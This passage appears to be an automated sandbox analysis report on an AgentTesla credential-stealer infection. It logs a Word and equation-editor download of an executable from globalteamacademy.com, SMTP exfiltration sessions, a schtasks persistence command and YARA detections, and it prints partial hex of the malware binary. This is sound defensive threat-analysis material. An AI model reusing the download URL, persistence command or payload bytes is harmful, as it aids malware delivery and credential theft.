                                                                              Feb 8, 2021 10:29:39.189776897 CET192.168.2.228.8.8.80x4734Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:49.391611099 CET192.168.2.228.8.8.80xc366Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:55.834018946 CET192.168.2.228.8.8.80xfd61Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:55.891953945 CET192.168.2.228.8.8.80xfd61Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Feb 8, 2021 10:28:18.410446882 CET8.8.8.8192.168.2.220x51f2No error (0)globalteamacademy.com43.252.37.193A (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:15.868436098 CET8.8.8.8192.168.2.220x651cNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:21.982553005 CET8.8.8.8192.168.2.220x8b18No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:22.033673048 CET8.8.8.8192.168.2.220x8b18No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:29.969630957 CET8.8.8.8192.168.2.220x12a7No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:39.251398087 CET8.8.8.8192.168.2.220x4734No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:49.443464994 CET8.8.8.8192.168.2.220xc366No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:55.891032934 CET8.8.8.8192.168.2.220xfd61No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:55.948849916 CET8.8.8.8192.168.2.220xfd61No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • globalteamacademy.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.224916743.252.37.19380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              TimestampkBytes transferredDirectionData
                                                                              Feb 8, 2021 10:28:18.638580084 CET0OUTGET /showcase/pal/TrC86HH4pxVZ49N.exe HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                              Host: globalteamacademy.com
                                                                              Connection: Keep-Alive
                                                                              Feb 8, 2021 10:28:18.852696896 CET2INHTTP/1.1 200 OK
                                                                              Date: Mon, 08 Feb 2021 09:28:20 GMT
                                                                              Server: Apache
                                                                              Last-Modified: Mon, 08 Feb 2021 03:31:11 GMT
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 734720
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-msdownload
                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a af 20 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 20 0b 00 00 14 00 00 00 00 00 00 3e 3e 0b 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 3d 0b 00 57 00 00 00 00 40 0b 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1e 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 12 00 00 00 40 0b 00 00 12 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3e 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 88 24 0a 00 5c 19 01 00 03 00 00 00 01 00 00 06 28 e1 00 00 60 43 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 07 00 00 0a 00 02 16 28 08 00 00 0a 00 02 17 28 09 00 00 0a 00 02 17 28 0a 00 00 0a 00 02 16 28 0b 00 00 0a 00 2a 00 4e 00 02 28 09 00 00 06 6f 16 00 00 06 28 0d 00 00 0a 00 2a 26 00 02 28 0f 00 00 0a 00 2a 00 00 ce 73 10 00 00 0a 80 01 00 00 04 73 11 00 00 0a 80 02 00 00 04 73 12 00 00 0a 80 03 00 00 04 73 13 00 00 0a 80 04 00 00 04 73 14 00 00 0a 80 05 00 00 04 2a 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 15 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 16 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 17 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 18 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 19 00 00 0a 0a 2b 00 06 2a 1b 30 05 00 ff 00 00 00 06 00 00 11 00 02 8c 06 00 00 1b 2c 0f 0f 00 fe 16 06 00 00 1b 6f 1e 00 00 0a 2b 01 17 0b 07 39 d8 00 00 00 7e 06 00 00 04 14 fe 03 0c 08 2c 32 7e 06 00 00 04 d0 06 00 00 1b 28 1f 00 00 0a 6f 20 00 00 0a 0d 09 2c 16 72 01 00 00 70 16 8d 18 00 00 01 28 21 00 00 0a 73 22 00 00 0a 7a 00 00 2b 0c 00 73 23 00 00 0a 80 06 00 00 04 00 7e 06 00 00 04 d0 06 00 00 1b 28 1f 00 00 0a 14 6f 24 00 00 0a 00 00 28 01 00 00 2b 0a de 74 75 14 00 00 01 25 2d 04 26
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL ` >> @ @=W@` H.textD `.rsrc@"@@.reloc`4@B >H$\(`C0(((o*(((((*N(o(*&(*sssss*0~o+*0~o+*0~o+*0~o+*0~o+*0,o+9~,2~(o ,rp(!s"z+s#~(o$(+tu%-&
                                                                              Feb 8, 2021 10:28:18.852761984 CET3INData Raw: 16 2b 19 25 28 26 00 00 0a 13 04 11 04 6f 27 00 00 0a 14 fe 03 13 05 11 05 16 fe 03 fe 11 26 72 3b 00 00 70 17 8d 18 00 00 01 25 16 11 04 6f 27 00 00 0a 6f 28 00 00 0a a2 28 21 00 00 0a 13 06 11 06 11 04 6f 27 00 00 0a 73 29 00 00 0a 7a 00 7e 06
                                                                              Data Ascii: +%(&o'&r;p%o'o((!o's)z~(o*+*1aZo+*&(,*0(-(.+*0(/+*0
                                                                              Feb 8, 2021 10:28:18.852811098 CET4INData Raw: 00 0a 8c 08 00 00 1b 14 fe 01 0b 07 2c 0a 28 1a 00 00 2b 80 34 00 00 0a 7e 34 00 00 0a 0a 2b 00 06 2a 00 00 26 00 02 28 2c 00 00 0a 00 2a 00 00 26 00 02 28 2c 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 0d 00 00 11 00 7e 14 00 00 04 14 28 36 00
                                                                              Data Ascii: ,(+4~4+*&(,*&(,*0<~(6,!rp(o7s8~+*0~+*"*0&(4rp~o9(-t'+*0<~(6
                                                                              Feb 8, 2021 10:28:18.852861881 CET6INData Raw: 00 0a 13 04 16 0c 02 7b 1e 00 00 04 6f 60 00 00 0a 13 08 38 4c 01 00 00 12 08 28 61 00 00 0a 13 09 11 04 12 09 28 69 00 00 0a 6f 6a 00 00 0a 00 28 09 00 00 06 6f 1c 00 00 06 7b 0b 01 00 04 13 0a 11 0a 39 df 00 00 00 09 12 09 28 69 00 00 0a 18 9a
                                                                              Data Ascii: {o`8L(a(ioj(o{9(iok9(ol(o{7rp(mon,*(ol(o{7rp(moo(ol(i(o{7rp(i(poq
                                                                              Feb 8, 2021 10:28:18.852900028 CET7INData Raw: 00 00 04 2b 00 2a 00 00 22 02 03 7d 2a 00 00 04 2a 00 00 00 22 7e 2b 00 00 04 2b 00 2a 00 00 00 1e 02 80 2b 00 00 04 2a 22 7e 2c 00 00 04 2b 00 2a 00 00 00 1e 02 80 2c 00 00 04 2a 26 02 7b 2d 00 00 04 2b 00 2a 00 00 22 02 03 7d 2d 00 00 04 2a 00
                                                                              Data Ascii: +*"}**"~++*+*"~,+*,*&{-+*"}-*&{.+*"}.*&{/+*"}/*"~0+*0*(,*0(o(g&*0Lrpoo%~!
                                                                              Feb 8, 2021 10:28:18.852940083 CET8INData Raw: 06 20 ba 00 00 00 20 b3 00 00 00 73 50 00 00 0a 6f 51 00 00 0a 00 02 6f 76 00 00 06 72 33 04 00 70 6f 52 00 00 0a 00 02 6f 76 00 00 06 1f 6e 1f 23 73 53 00 00 0a 6f 54 00 00 0a 00 02 6f 76 00 00 06 1a 6f 55 00 00 0a 00 02 6f 76 00 00 06 72 47 04
                                                                              Data Ascii: sPoQovr3poRovn#sSoTovoUovrGpoovo"@"PAsV(W(X sS(Y(Zovo[(Zoto[(Zoro[(Zopo[(Zono[
                                                                              Feb 8, 2021 10:28:18.852978945 CET10INData Raw: 97 00 00 06 00 02 73 b5 00 00 0a 6f 99 00 00 06 00 02 73 b6 00 00 0a 6f 9b 00 00 06 00 02 73 97 00 00 0a 6f 9d 00 00 06 00 02 28 4f 00 00 0a 00 02 6f 7e 00 00 06 72 e5 04 00 70 22 00 00 10 41 16 19 16 73 99 00 00 0a 6f 9a 00 00 0a 00 02 6f 7e 00
                                                                              Data Ascii: sososo(Oo~rp"Asoo~ !sPoQo~rpoRo~KsSoTo~oUo~rpoo~oooorp"AsootQsP
                                                                              Feb 8, 2021 10:28:18.853018045 CET11INData Raw: 37 00 00 00 1a 00 00 11 02 fe 06 9f 00 00 06 73 47 00 00 0a 0a 02 7b 43 00 00 04 0b 07 2c 07 07 06 6f c0 00 00 0a 02 03 7d 43 00 00 04 02 7b 43 00 00 04 0b 07 2c 07 07 06 6f c1 00 00 0a 2a 00 26 02 7b 44 00 00 04 2b 00 2a 00 00 13 30 02 00 37 00
                                                                              Data Ascii: 7sG{C,o}C{C,o*&{D+*07sG{D,o}D{D,o*&{E+*07sG{E,o}E{E,o*&{F+*"}F
                                                                              Feb 8, 2021 10:28:18.853060007 CET13INData Raw: 9d 00 00 0a 00 02 6f ac 00 00 06 17 6f 9e 00 00 0a 00 02 6f ae 00 00 06 72 e5 04 00 70 22 00 00 1c 41 16 19 16 73 99 00 00 0a 6f 9a 00 00 0a 00 02 6f ae 00 00 06 20 c6 00 00 00 20 2a 01 00 00 73 50 00 00 0a 6f 51 00 00 0a 00 02 6f ae 00 00 06 72
                                                                              Data Ascii: ooorp"Asoo *sPoQorpoRoKsSoTooUorpooo"@"PAsV(W(X sS(Y(Zoo[(Zoo[
                                                                              Feb 8, 2021 10:28:19.057574987 CET14INData Raw: 09 00 70 6f ce 00 00 0a 00 06 72 6d 06 00 70 6f da 00 00 0a 00 06 72 72 09 00 70 6f cf 00 00 0a 00 00 06 6f a8 00 00 0a 26 06 6f d1 00 00 0a 80 9e 00 00 04 02 7e 9e 00 00 04 28 db 00 00 0a 74 27 00 00 01 7d 5b 00 00 04 02 6f f7 00 00 06 02 7b 5b
                                                                              Data Ascii: pormporrpoo&o~(t'}[o{[oooooo%(&(*-Z0y%~rmp(s,No{_rp(oooorm
                                                                              Feb 8, 2021 10:28:19.057729959 CET16INData Raw: 73 f4 00 00 0a 6f e0 00 00 06 00 02 73 f4 00 00 0a 6f e2 00 00 06 00 02 73 f4 00 00 0a 6f e4 00 00 06 00 02 73 f5 00 00 0a 6f ea 00 00 06 00 02 73 f4 00 00 0a 6f ec 00 00 06 00 02 73 f4 00 00 0a 6f e6 00 00 06 00 02 73 f4 00 00 0a 6f e8 00 00 06
                                                                              Data Ascii: sosososososososososososososososososososos


                                                                              SMTP Packets

                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                              Feb 8, 2021 10:29:16.280077934 CET58749168198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                              Feb 8, 2021 10:29:16.280643940 CET49168587192.168.2.22198.54.122.60EHLO 783875
                                                                              Feb 8, 2021 10:29:16.469336987 CET58749168198.54.122.60192.168.2.22250-MTA-06.privateemail.com
                                                                              250-PIPELINING
                                                                              250-SIZE 81788928
                                                                              250-ETRN
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-ENHANCEDSTATUSCODES
                                                                              250-8BITMIME
                                                                              250 STARTTLS
                                                                              Feb 8, 2021 10:29:16.470200062 CET49168587192.168.2.22198.54.122.60STARTTLS
                                                                              Feb 8, 2021 10:29:16.659040928 CET58749168198.54.122.60192.168.2.22220 Ready to start TLS
                                                                              Feb 8, 2021 10:29:22.416186094 CET58749169198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                              Feb 8, 2021 10:29:22.416733027 CET49169587192.168.2.22198.54.122.60EHLO 783875
                                                                              Feb 8, 2021 10:29:22.605782032 CET58749169198.54.122.60192.168.2.22250-MTA-06.privateemail.com
                                                                              250-PIPELINING
                                                                              250-SIZE 81788928
                                                                              250-ETRN
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-ENHANCEDSTATUSCODES
                                                                              250-8BITMIME
                                                                              250 STARTTLS
                                                                              Feb 8, 2021 10:29:22.606370926 CET49169587192.168.2.22198.54.122.60STARTTLS
                                                                              Feb 8, 2021 10:29:22.795337915 CET58749169198.54.122.60192.168.2.22220 Ready to start TLS
                                                                              Feb 8, 2021 10:29:30.349409103 CET58749171198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                              Feb 8, 2021 10:29:30.350186110 CET49171587192.168.2.22198.54.122.60EHLO 783875
                                                                              Feb 8, 2021 10:29:30.538182974 CET58749171198.54.122.60192.168.2.22250-MTA-06.privateemail.com
                                                                              250-PIPELINING
                                                                              250-SIZE 81788928
                                                                              250-ETRN
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-ENHANCEDSTATUSCODES
                                                                              250-8BITMIME
                                                                              250 STARTTLS
                                                                              Feb 8, 2021 10:29:30.538736105 CET49171587192.168.2.22198.54.122.60STARTTLS
                                                                              Feb 8, 2021 10:29:30.726928949 CET58749171198.54.122.60192.168.2.22220 Ready to start TLS
                                                                              Feb 8, 2021 10:29:39.634231091 CET58749172198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                              Feb 8, 2021 10:29:39.634582043 CET49172587192.168.2.22198.54.122.60EHLO 783875
                                                                              Feb 8, 2021 10:29:39.822638035 CET58749172198.54.122.60192.168.2.22250-MTA-06.privateemail.com
                                                                              250-PIPELINING
                                                                              250-SIZE 81788928
                                                                              250-ETRN
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-ENHANCEDSTATUSCODES
                                                                              250-8BITMIME
                                                                              250 STARTTLS
                                                                              Feb 8, 2021 10:29:39.823504925 CET49172587192.168.2.22198.54.122.60STARTTLS
                                                                              Feb 8, 2021 10:29:40.011332035 CET58749172198.54.122.60192.168.2.22220 Ready to start TLS
                                                                              Feb 8, 2021 10:29:49.827069044 CET58749173198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                              Feb 8, 2021 10:29:49.827635050 CET49173587192.168.2.22198.54.122.60EHLO 783875
                                                                              Feb 8, 2021 10:29:50.016246080 CET58749173198.54.122.60192.168.2.22250-MTA-06.privateemail.com
                                                                              250-PIPELINING
                                                                              250-SIZE 81788928
                                                                              250-ETRN
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-ENHANCEDSTATUSCODES
                                                                              250-8BITMIME
                                                                              250 STARTTLS
                                                                              Feb 8, 2021 10:29:50.016700029 CET49173587192.168.2.22198.54.122.60STARTTLS
                                                                              Feb 8, 2021 10:29:50.206713915 CET58749173198.54.122.60192.168.2.22220 Ready to start TLS
                                                                              Feb 8, 2021 10:29:56.330127954 CET58749174198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                              Feb 8, 2021 10:29:56.330699921 CET49174587192.168.2.22198.54.122.60EHLO 783875
                                                                              Feb 8, 2021 10:29:56.519401073 CET58749174198.54.122.60192.168.2.22250-MTA-06.privateemail.com
                                                                              250-PIPELINING
                                                                              250-SIZE 81788928
                                                                              250-ETRN
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-ENHANCEDSTATUSCODES
                                                                              250-8BITMIME
                                                                              250 STARTTLS
                                                                              Feb 8, 2021 10:29:56.519946098 CET49174587192.168.2.22198.54.122.60STARTTLS
                                                                              Feb 8, 2021 10:29:56.711216927 CET58749174198.54.122.60192.168.2.22220 Ready to start TLS

                                                                              Code Manipulations

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Start time:10:27:39
                                                                              Start date:08/02/2021
                                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                              Imagebase:0x13f2e0000
                                                                              File size:1424032 bytes
                                                                              MD5 hash:95C38D04597050285A18F66039EDB456
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:10:27:40
                                                                              Start date:08/02/2021
                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                              Imagebase:0x400000
                                                                              File size:543304 bytes
                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:10:28:00
                                                                              Start date:08/02/2021
                                                                              Path:C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              Imagebase:0xc90000
                                                                              File size:734720 bytes
                                                                              MD5 hash:CEDD3570A65CE74199167DA6E5190CC4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2139955625.0000000002471000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2140668644.0000000003479000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              General

                                                                              Start time:10:28:04
                                                                              Start date:08/02/2021
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp'
                                                                              Imagebase:0x4c0000
                                                                              File size:179712 bytes
                                                                              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:10:28:04
                                                                              Start date:08/02/2021
                                                                              Path:C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                                                                              Imagebase:0xc90000
                                                                              File size:734720 bytes
                                                                              MD5 hash:CEDD3570A65CE74199167DA6E5190CC4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2395069927.000000000239D000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2394346599.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2395457752.00000000026F7000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2394957698.00000000022D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >

                                                                                Executed Functions

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tEm
                                                                                • API String ID: 0-3333056351
                                                                                • Opcode ID: 95991d210d1038be6de23228bec34cce595bb9e57c2322789afc530716ff4fb9
                                                                                • Instruction ID: 797d3a898ddea489c254ac016eba323b2fab58bf70e4f20c3c8ddf71b84d20c0
                                                                                • Opcode Fuzzy Hash: 95991d210d1038be6de23228bec34cce595bb9e57c2322789afc530716ff4fb9
                                                                                • Instruction Fuzzy Hash: A8D10070D05228CFDB15DFA5C894BEEBBB6BF8A300F1485AAD409BB251D7345A85CF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (
                                                                                • API String ID: 0-3887548279
                                                                                • Opcode ID: 09d4531039919931dd7e4369b964abafe01a76da825cbaf61253fdfc4eaabd89
                                                                                • Instruction ID: a0dd85a8af303475d1dd0d3a1eb6257280e58a8711ff5294c29aa41e9ffe194b
                                                                                • Opcode Fuzzy Hash: 09d4531039919931dd7e4369b964abafe01a76da825cbaf61253fdfc4eaabd89
                                                                                • Instruction Fuzzy Hash: 1BE1DC74901228CFDB65DF68D984BEDBBB1AB4A315F1084EAD509AB291CB309EC5CF41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b7c645412175051b9dca124cc453bb028a0b8c4651742a3b9ab705cb44a69696
                                                                                • Instruction ID: fe153a5a7aa6a9e07bd51f923d9e074efff83abfd2739cc8ab2f13c89dbaea76
                                                                                • Opcode Fuzzy Hash: b7c645412175051b9dca124cc453bb028a0b8c4651742a3b9ab705cb44a69696
                                                                                • Instruction Fuzzy Hash: 3FD1EF74D05228CFDB65DF64D885BEDBBB5AF4A304F1080EAD509AB291DB709E85CF80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d51bf896e7b22ec44f6f132d337a32b0bcbabda86bc44d7a8daa355e3d44034a
                                                                                • Instruction ID: ff1f0c12f86a2c83fcd9f349dddab0a71386bedbdd455d6b7c4f938466ab9e02
                                                                                • Opcode Fuzzy Hash: d51bf896e7b22ec44f6f132d337a32b0bcbabda86bc44d7a8daa355e3d44034a
                                                                                • Instruction Fuzzy Hash: A3C1ED70D012288FDB65DF64D985BEDBBB1AB4A305F0080EAD50DAB291CB309EC5CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3fc2031f827b3f5c694517bca29f16cbc487dede702650e587bf960994c3c629
                                                                                • Instruction ID: 4b59db44cfa379fdc1be952190acc779df238971d18713b8a772fdf4f03b186c
                                                                                • Opcode Fuzzy Hash: 3fc2031f827b3f5c694517bca29f16cbc487dede702650e587bf960994c3c629
                                                                                • Instruction Fuzzy Hash: 479100B4E006098FCB04CFE9C480AEEBBF6AF88305F648529D559AB755EB349D41CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 23024f3b0fe755d143380707ed25da939d05f1c31c0241fdc75895da8f9c39f0
                                                                                • Instruction ID: a941474d590ed99be9d438393638c9632766540766d4c4790cd856a9f8c059ce
                                                                                • Opcode Fuzzy Hash: 23024f3b0fe755d143380707ed25da939d05f1c31c0241fdc75895da8f9c39f0
                                                                                • Instruction Fuzzy Hash: 17912670E00218CFDF15DFA9C881BDEBBB6BF98315F60C469D608AB205DB345A858F51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 528cc81e1ea90dee6f4c706509fa6703844f1f841dc73bf4d4132d8067e9a76a
                                                                                • Instruction ID: 06f664ad9c83e6eeb2b1a60ca8a53159b986e54ba45403c74a259abf085dd0e8
                                                                                • Opcode Fuzzy Hash: 528cc81e1ea90dee6f4c706509fa6703844f1f841dc73bf4d4132d8067e9a76a
                                                                                • Instruction Fuzzy Hash: 9C511174E046088FDB04CFAAC580AEEBBF6AF88301F64C52AD558AB715EB349D41CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2139457101.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 57ddd90417a5cd00655c6c484df872b4e727f635504ca8765a700a74b01e2ecc
